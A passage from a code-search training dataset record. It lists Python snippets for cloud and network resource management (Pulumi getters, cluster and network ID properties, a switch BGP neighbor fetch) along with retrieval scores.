__props__.__dict__[\"parent_cluster_resource_id\"] = None\n __props__.__dict__[\"private_link_scope_resource_id\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"resources\"] = None\n __props__.__dict__[\"service_statuses\"] = None\n __props__.__dict__[\"status\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"vm_id\"] = None\n __props__.__dict__[\"vm_uuid\"] = None\n return Machine(resource_name, opts=opts, __props__=__props__)",
"def get(self, depth=None, selector=None):\n logging.info(\"Retrieving %s from switch\", self)\n\n depth = depth or self.session.api.default_depth\n selector = selector or self.session.api.default_selector\n\n if not self.session.api.valid_depth(depth):\n depths = self.session.api.valid_depths\n raise Exception(\"ERROR: Depth should be {0}\".format(depths))\n\n if selector not in self.session.api.valid_selectors:\n selectors = \" \".join(self.session.api.valid_selectors)\n raise Exception(\n \"ERROR: Selector should be one of {0}\".format(selectors)\n )\n\n payload = {\"depth\": depth, \"selector\": selector}\n\n uri = \"{0}/{1}\".format(self.base_uri, self.ip_or_ifname_or_group_name)\n\n try:\n response = self.session.request(\"GET\", uri, params=payload)\n\n except Exception as e:\n raise ResponseError(\"GET\", e)\n\n if not utils._response_ok(response, \"GET\"):\n raise GenericOperationError(response.text, response.status_code)\n\n data = json.loads(response.text)\n\n # Add dictionary as attributes for the object\n utils.create_attrs(self, data)\n\n # Determines if the BGP Neighbor is configurable\n if selector in self.session.api.configurable_selectors:\n # Set self.config_attrs and delete ID from it\n utils.set_config_attrs(\n self, data, \"config_attrs\", [\"ip_or_ifname_or_group_name\"]\n )\n\n # Set original attributes\n self.__original_attributes = data\n # Remove ID\n if \"ip_or_ifname_or_group_name\" in self.__original_attributes:\n self.__original_attributes.pop(\"ip_or_ifname_or_group_name\")\n\n # If the BGP Neighbor has a local_interface inside the switch\n if hasattr(self, \"local_interface\") and self.local_interface:\n local_interface_response = self.local_interface\n interface_cls = self.session.api.get_module(\n self.session, \"Interface\", \"\"\n )\n # Set port as a Interface Object\n self.local_interface = interface_cls.from_response(\n self.session, local_interface_response\n )\n self.local_interface.get()\n\n # Sets object as materialized\n # Information is loaded from the Device\n self.materialized = True\n return True",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"auto_renew\"] = auto_renew\n __props__.__dict__[\"auto_renew_period\"] = auto_renew_period\n __props__.__dict__[\"cluster_name\"] = cluster_name\n __props__.__dict__[\"data_center_name\"] = data_center_name\n __props__.__dict__[\"disk_size\"] = disk_size\n __props__.__dict__[\"disk_type\"] = disk_type\n __props__.__dict__[\"enable_public\"] = enable_public\n __props__.__dict__[\"instance_type\"] = instance_type\n __props__.__dict__[\"ip_white\"] = ip_white\n __props__.__dict__[\"maintain_end_time\"] = maintain_end_time\n __props__.__dict__[\"maintain_start_time\"] = maintain_start_time\n __props__.__dict__[\"major_version\"] = major_version\n __props__.__dict__[\"node_count\"] = node_count\n __props__.__dict__[\"password\"] = password\n __props__.__dict__[\"pay_type\"] = pay_type\n __props__.__dict__[\"period\"] = period\n __props__.__dict__[\"period_unit\"] = period_unit\n __props__.__dict__[\"public_points\"] = public_points\n __props__.__dict__[\"security_groups\"] = security_groups\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Cluster(resource_name, opts=opts, __props__=__props__)",
"def network_get(auth=None, **kwargs):\n cloud = get_operator_cloud(auth)\n kwargs = _clean_kwargs(**kwargs)\n return cloud.get_network(**kwargs)",
"def get_network_interface(\n name=None,\n network_interface_id=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n):\n conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)\n r = {}\n result = _get_network_interface(conn, name, network_interface_id)\n if \"error\" in result:\n if result[\"error\"][\"message\"] == \"No ENIs found.\":\n r[\"result\"] = None\n return r\n return result\n eni = result[\"result\"]\n r[\"result\"] = _describe_network_interface(eni)\n return r",
"def get_state_machine(self, name):\n response = self.client.list_state_machines()\n print(response)\n if not response.get('stateMachines'):\n return None\n for sm in response.get('stateMachines'):\n if sm['name'] == name:\n return sm['stateMachineArn']",
"def state(self):\n state = self._resource.get('state', self.default_state)\n\n if state in State:\n return state\n else:\n return getattr(State, state)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n virtual_hub_id: Optional[pulumi.Input[str]] = None) -> 'VirtualNetworkAppliance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VirtualNetworkApplianceState.__new__(_VirtualNetworkApplianceState)\n\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"virtual_hub_id\"] = virtual_hub_id\n return VirtualNetworkAppliance(resource_name, opts=opts, __props__=__props__)",
"def get_resource(self, node_name, resource_name):\n\n if self._xmldoc is None:\n return None\n\n xmlroot = self._xmldoc.getroot()\n\n xmlresource = xmlroot.find(\".//status/node_state[@id='%s']/\"\n \"lrm[@id='%s']/lrm_resources/\"\n \"lrm_resource[@id='%s']/lrm_rsc_op\"\n % (node_name, node_name, resource_name))\n if not etree.iselement(xmlresource):\n return None\n\n resource = PaceMakerResource(node_name, resource_name)\n\n resource.last_operation = xmlresource.attrib[\"operation\"]\n\n if (xmlresource.attrib[\"operation\"] == \"start\" or\n xmlresource.attrib[\"operation\"] == \"promote\"):\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_ENABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n\n elif (xmlresource.attrib[\"operation\"] == \"stop\" or\n xmlresource.attrib[\"operation\"] == \"demote\"):\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_DISABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n\n elif xmlresource.attrib[\"operation\"] == \"monitor\":\n if xmlresource.attrib[\"rc-code\"] == \"0\":\n resource.state = RESOURCE_STATE_ENABLED\n elif xmlresource.attrib[\"rc-code\"] == \"7\":\n resource.state = RESOURCE_STATE_DISABLED\n else:\n resource.state = RESOURCE_STATE_FAILED\n else:\n resource.state = RESOURCE_STATE_UNKNOWN\n\n return resource",
"def get_uid_state(self, id_or_uri):\n uri = self._client.build_uri(id_or_uri) + \"/uidState\"\n return self._client.get(uri)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None) -> 'TargetPool':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TargetPoolState.__new__(_TargetPoolState)\n\n __props__.__dict__[\"backup_pool\"] = backup_pool\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"failover_ratio\"] = failover_ratio\n __props__.__dict__[\"health_checks\"] = health_checks\n __props__.__dict__[\"instances\"] = instances\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"self_link\"] = self_link\n __props__.__dict__[\"session_affinity\"] = session_affinity\n return TargetPool(resource_name, opts=opts, __props__=__props__)"
] | [
"0.5696972",
"0.5616301",
"0.559337",
"0.55891603",
"0.55436486",
"0.5497109",
"0.54890585",
"0.5482085",
"0.5455767",
"0.5444336",
"0.54149556",
"0.53990793",
"0.53760177",
"0.53489095",
"0.534057",
"0.5307886",
"0.5290895",
"0.529065",
"0.5247792",
"0.5244457",
"0.5226916",
"0.5215637",
"0.520895",
"0.5200015",
"0.516398",
"0.50524247",
"0.5008109",
"0.4965296",
"0.4962385",
"0.4961434",
"0.49410954",
"0.49284518",
"0.49163172",
"0.49142632",
"0.48865956",
"0.48708117",
"0.486166",
"0.48527232",
"0.48480058",
"0.48449975",
"0.4840699",
"0.48014778",
"0.48004532",
"0.47821766",
"0.47713277",
"0.47684792",
"0.47678363",
"0.47452232",
"0.47442412",
"0.47119805",
"0.4709975",
"0.46966147",
"0.46908882",
"0.46894923",
"0.46746296",
"0.46645778",
"0.46626875",
"0.46570235",
"0.46522754",
"0.46473414",
"0.46413997",
"0.4634389",
"0.4628288",
"0.45980322",
"0.45968214",
"0.4588655",
"0.4572744",
"0.45705715",
"0.45560083",
"0.45511425",
"0.45459312",
"0.45441487",
"0.4527366",
"0.45256647",
"0.45247942",
"0.4517443",
"0.45172703",
"0.45119807",
"0.45095566",
"0.45084855",
"0.45080325",
"0.45051858",
"0.44962224",
"0.4493394",
"0.44933766",
"0.44827092",
"0.44762692",
"0.4474365",
"0.44688186",
"0.44606164",
"0.44562405",
"0.44451553",
"0.44445923",
"0.44393697",
"0.44383848",
"0.44305983",
"0.44295493",
"0.44154134",
"0.44128808",
"0.44118914"
] | 0.6454363 | 0 |
The list of resource IDs for the other Microsoft.NetworkCloud resources that have attached this network. | def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "associated_resource_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_ids(self):\n return self._network_ids",
"def otherResources(self):\n return self._get_list_field(\"otherResources\")",
"def resource_names(self):\n return self._resource_names",
"def get_ids(self):\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict",
"def network_fabric_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"network_fabric_ids\")",
"def resources(self):\n return self._resources",
"def resources(self):\n return self._resources",
"def resources(self):\n return self._resources",
"def GetResourceNames(self):\r\n return [x.name for x in self.resources]",
"def getResources(self):\n\t\treturn deepcopy(self.server.resources)",
"def resources(self):\n res = []\n for resource in self._resources:\n res = res + resource.resources()\n\n return res",
"def resources(self):\n res = []\n for resource in self._resources:\n res = res + resource.resources()\n\n return res",
"def network_interface_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"network_interface_ids\")",
"def parent_resources(cls):\n parent = cls.parent_resource\n parents = [parent]\n\n try:\n while True:\n parent = parent.parent_resource\n parents.append(parent)\n except AttributeError:\n pass\n\n parents.reverse()\n return parents",
"def link_ids(self):\n return self._link_ids",
"def get_resources(self):\n return []",
"def resources(self) -> \"Resources\":\n return self._resources",
"def tenant_internet_gateway_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"tenant_internet_gateway_ids\")",
"def get_parent_resource_nodes(self):\n raise errors.Unimplemented()",
"def pool_ids(self) -> Sequence[str]:\n return pulumi.get(self, \"pool_ids\")",
"def ids(self):\n return self._ids",
"def list_networks():\n return __sets.keys()",
"def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"virtual_machines_associated_ids\")",
"def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"virtual_machines_associated_ids\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resources(self) -> [ListResourcesResponse]:\n resources = []\n\n layers = self.layers\n for layer_name in layers:\n layer_arns = self.layer_version_arns(layer_name)\n for arn in layer_arns:\n list_resources_response = ListResourcesResponse(\n service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,\n resource_type=self.resource_type, name=layer_name)\n resources.append(list_resources_response)\n return resources",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def parent_ids(self):\n return self._parent_ids",
"def remote_get_ids(self):\n return self.smultiengine.get_ids()",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resources\")",
"def get_ids(self):\n return self._ids",
"def resources(self) -> Sequence['outputs.GetResourcesResourceResult']:\n return pulumi.get(self, \"resources\")",
"def resources(self) -> pulumi.Output[Sequence['outputs.MachineExtensionResponse']]:\n return pulumi.get(self, \"resources\")",
"def GetExclusiveResources(self):\n res = set(self.exclusive_resources)\n if self.parent:\n res |= self.parent.GetExclusiveResources()\n return res",
"def related_resources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KlusterletStatusRelatedResourcesArgs']]]]:\n return pulumi.get(self, \"related_resources\")",
"def network_instances(self) -> Iterator[NetworkInstance]:\n return self._get_related_instance(NetworkInstance, \"l3-network\")",
"def references(self):\n return self._get_related_resources(False)",
"def all_base_cloud_ids(self):\n raise NotImplementedError",
"def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def resource_id_patterns(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_id_patterns\")",
"def resource_group_ids_scope(self) -> str:\n return pulumi.get(self, \"resource_group_ids_scope\")",
"def resource_group_ids_scope(self) -> str:\n return pulumi.get(self, \"resource_group_ids_scope\")",
"def resources(self):\n return self.__resources",
"def getRefreshIDs(self):\n ids = []\n for bucket in self.router.getLonelyBuckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def multi_zone_ids(self) -> Sequence[str]:\n return pulumi.get(self, \"multi_zone_ids\")",
"def disk_ids(self):\n return list(self._disks)",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def resources(self):\n return list(self.get_resources_for_type(gdef.ResType_All))",
"def node_ids(self):\n return [self.node_id]",
"def create_resources(self) -> List[ResourceDescription]:\r\n return self.resources",
"def networks(self) -> dict:\n return self.data[\"networks\"]",
"def netlist(self):\n return self._netlist",
"def resource_names(self) -> pulumi.Output[Optional[Mapping[str, Sequence[str]]]]:\n return pulumi.get(self, \"resource_names\")",
"def getIDs(self):\n return self.multiengine.getIDs()",
"def names(self):\r\n return resource.Name(self)",
"def subresources(self):\n return self._get_related_resources(True)",
"def get_node_ids(self):\n \n return self.node_ids",
"def resource_types(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_types\")",
"def getNets(self):\n\t\treturn NetLoader.listNetworks()",
"def resources(self):\n\n return self.FIXTURE.resources_collection(self)",
"def cluster_ids(self):\n return self.model.cluster_ids",
"def list_networks(self):\n return self._get_names('SCLogicalNetwork')",
"def getAssociatedImagesList(self):\n return sorted(self._associatedImages.keys())",
"def resource_types(self) -> ConfigNodePropertyArray:\n return self._resource_types",
"def list_connections(self):\n return self.network.list_connections()",
"def resources(self):\r\n return self.page.object_list",
"def get_resources(self):\n client = self.client\n if self.resources:\n return self.resources\n\n response = client.list_buckets()\n for resource in response['Buckets']:\n resource_name = resource['Name']\n tags = client.get_bucket_tagging(\n Bucket=resource_name\n )\n self.resources.append({\n \"Name\": resource_name,\n \"Tags\": tags.get(\"TagSet\")\n })\n\n return self.resources",
"def fhir_resource_concepts(self) -> Set[URIRef]:\n return {subj for subj in self.graph.transitive_subjects(RDFS.subClassOf, FHIR.Resource)\n if isinstance(subj, URIRef) and not self.w5_ontology.is_w5_infrastructure(subj)}",
"def get_ids(self):\n return self._graphs.keys()",
"def join_ids(self) -> List[int]:\n return self._join_ids",
"def networks(self) -> Sequence['outputs.NetworkConfigResponse']:\n return pulumi.get(self, \"networks\")",
"def ids(self):\n return list(self._id_generator())",
"def ids(self):\n return list(self._id_generator())",
"def get_resources(self, **extra_args):\n return [lrms for lrms in self.resources.itervalues()]",
"def virtual_networks(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceIdResponse']]]:\n return pulumi.get(self, \"virtual_networks\")",
"def get_resources(self):\n res = set()\n res.update(self.get_inputs())\n res.update(self.get_outputs())\n return res",
"def getAttachIds(self):\n return self._attachments.keys()",
"def otherResources(self, otherResources):\n return self._set_list_field(\"otherResources\", otherResources)",
"def resource_navigation_links(self) -> Sequence['outputs.ResourceNavigationLinkResponse']:\n return pulumi.get(self, \"resource_navigation_links\")",
"def get_sub_resources(self) -> List[Resource]:\n result: List[Resource] = []\n all_names: Set[str] = {i.name for i in self.sub_resources}\n added_names: Set[str] = set()\n sub_resources = list(self.sub_resources)\n sub_resources_list: List[Tuple[Resource, List[InternalImport]]] = []\n for sub_resource in sub_resources:\n internal_imports = sub_resource.get_internal_imports()\n sub_resources_list.append((sub_resource, internal_imports))\n\n sub_resources_list.sort(key=lambda x: len(x[1]))\n for sub_resource, internal_imports in sub_resources_list:\n for internal_import in internal_imports:\n if internal_import.name not in all_names:\n continue\n if internal_import.name in added_names:\n continue\n\n internal_import.stringify = True\n\n result.append(sub_resource)\n added_names.add(sub_resource.name)\n\n return result",
"def listReferenceImages(self):\n productPath = self.productSearch.productClient.product_path(\n project=self.productSearch.projectId, location=self.productSearch.location, product=self.productId)\n\n images = self.productSearch.productClient.list_reference_images(parent=productPath)\n return [x.name for x in images]",
"def security_list_ids(self):\n return self._security_list_ids",
"def layers(self):\n resources = []\n\n paginator = self.client.get_paginator('list_layers')\n page_iterator = paginator.paginate()\n for page in page_iterator:\n layers = page[\"Layers\"]\n for layer in layers:\n name = layer.get(\"LayerName\")\n arn = layer.get(\"LayerArn\")\n resources.append(name)\n return resources",
"def ids(self):\n\n return self._d.keys()",
"def network_list(self, kwargs=None):\n try:\n scode, networks = Rest.get('Network')\n except docker.errors.APIError as e:\n Console.error(e.explanation)\n return\n\n if len(networks) == 0:\n Console.info(\"No network exist\")\n return\n\n n = 1\n e = {}\n data = []\n for network in networks:\n d = {}\n d['Ip'] = network['Ip']\n d['Id'] = network['Id']\n d['Name'] = network['Name']\n d['Containers'] = network['Containers']\n e[n] = d\n n = n + 1\n Console.ok(str(Printer.dict_table(e, order=['Ip', 'Id', 'Name', 'Containers'])))",
"def get_child_resource_nodes(self):\n raise errors.Unimplemented()",
"def resources(self):\n return [self]",
"def edges(self):\r\n return self.capacity.keys()",
"def get_all_resources(self) -> typing.List:\n\n session = self.session()\n\n try:\n available_peers = session\\\n .query(\n ResourceTable.peerIp,\n ResourceTable.peerPort,\n ResourceTable.resourcePath,\n ResourceTable.resourceName,\n ResourceTable.resourceHash\n )\\\n .group_by(ResourceTable.peerId, ResourceTable.resourceHash)\\\n .all()\n\n return available_peers\n\n finally:\n session.close()",
"def getAssociatedImagesList(self):\n imageList = set(self._associatedImages)\n for td in self._tiffDirectories:\n if td is not None:\n imageList |= set(td._embeddedImages)\n return sorted(imageList)",
"def non_resource_ur_ls(self):\n return self._non_resource_ur_ls",
"def network_configurations(self) -> Sequence['outputs.ApplianceNetworkConfigurationResponse']:\n return pulumi.get(self, \"network_configurations\")",
"def network_configurations(self) -> Sequence['outputs.ApplianceNetworkConfigurationResponse']:\n return pulumi.get(self, \"network_configurations\")"
] | [
"0.69101155",
"0.6573186",
"0.6401023",
"0.6343839",
"0.6258195",
"0.5978847",
"0.5978847",
"0.5978847",
"0.5819962",
"0.5801385",
"0.5795712",
"0.5795712",
"0.57860464",
"0.57594633",
"0.5741592",
"0.5688209",
"0.5666085",
"0.5643691",
"0.56345814",
"0.5630704",
"0.5611117",
"0.5605345",
"0.55991346",
"0.55991346",
"0.55941325",
"0.55941325",
"0.55689716",
"0.5566267",
"0.5565457",
"0.55476016",
"0.5528881",
"0.5528881",
"0.5528881",
"0.5528881",
"0.5525145",
"0.55244195",
"0.55172276",
"0.5514684",
"0.551415",
"0.5501953",
"0.54333764",
"0.5432878",
"0.5431186",
"0.5425353",
"0.53965825",
"0.53965825",
"0.5395765",
"0.53955436",
"0.53865266",
"0.53710026",
"0.53562415",
"0.53562415",
"0.53562415",
"0.5354804",
"0.53522205",
"0.5351963",
"0.5350555",
"0.5344895",
"0.5331135",
"0.5330883",
"0.53184456",
"0.531353",
"0.5301585",
"0.5299973",
"0.5299485",
"0.5295163",
"0.5287652",
"0.52772945",
"0.5276725",
"0.52682817",
"0.52592003",
"0.52515316",
"0.5232792",
"0.52318674",
"0.52067125",
"0.51997143",
"0.518026",
"0.51798964",
"0.51798964",
"0.51772213",
"0.51766473",
"0.5169453",
"0.5168469",
"0.5165043",
"0.5162558",
"0.5147888",
"0.5139649",
"0.5138532",
"0.5123874",
"0.511628",
"0.5115927",
"0.511191",
"0.51116484",
"0.5109726",
"0.5107868",
"0.51072663",
"0.51019126",
"0.5095978",
"0.5095978"
] | 0.70806557 | 1 |
The resource ID of the Network Cloud cluster this L3 network is associated with. | def cluster_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "cluster_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self):\n return self._cluster_id",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_identifier(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_identifier\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def orig_cluster_id(self):\n if self.old_cluster_name is None:\n raise RuntimeError('old_cluster_name is not set')\n return self.fuel_web.client.get_cluster_id(self.old_cluster_name)",
"def get_cluster_id(self):\n cmd = \"svcinfo lscluster -delim :\"\n\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n return None\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_CLUSTER_ID)\n cluster_id = values[index]\n return cluster_id",
"def parent_cluster_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def cloud_services_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cloud_services_network_id\")",
"def resource_type(self):\n return 'cluster'",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def cni_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cni_network_id\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def get_cluster_id(options):\n cluster = options.cluster\n datacenter = get_datacenter(options)\n for item in datacenter.hostFolder.childEntity:\n if (item.name == cluster):\n return item._GetMoId()",
"def _get_network_id(self):\n pubnet = self.conn.network.find_network('public')\n net = self.conn.network.find_network(self.net_conf['net_name'])\n subnet = self.conn.network.find_subnet(self.net_conf['subnet_name'])\n # TODO: Add support for security group\n\n self.network_id = {\n 'public': pubnet.id,\n 'net': net.id,\n 'subnet': subnet.id\n }",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def cluster_name(self):\n return self.name",
"def cluster_name(self):\n return self._data['cluster_name']",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def _newClusterId(self):\n return self.guidGenerator.new_id()",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def cluster_type(self) -> str:\n return pulumi.get(self, \"cluster_type\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def id(self):\n if self.cloudserver:\n return self.cloudserver.id\n else:\n return None",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def cluster_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def core_network_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_arn\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")",
"def central_node_id(self):\n if self._central_node_id is None:\n return self.nodes[0]\n else:\n return self._central_node_id",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id",
"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
"def datacenter_uuid(self) -> str:\n return self.__datacenter_uuid",
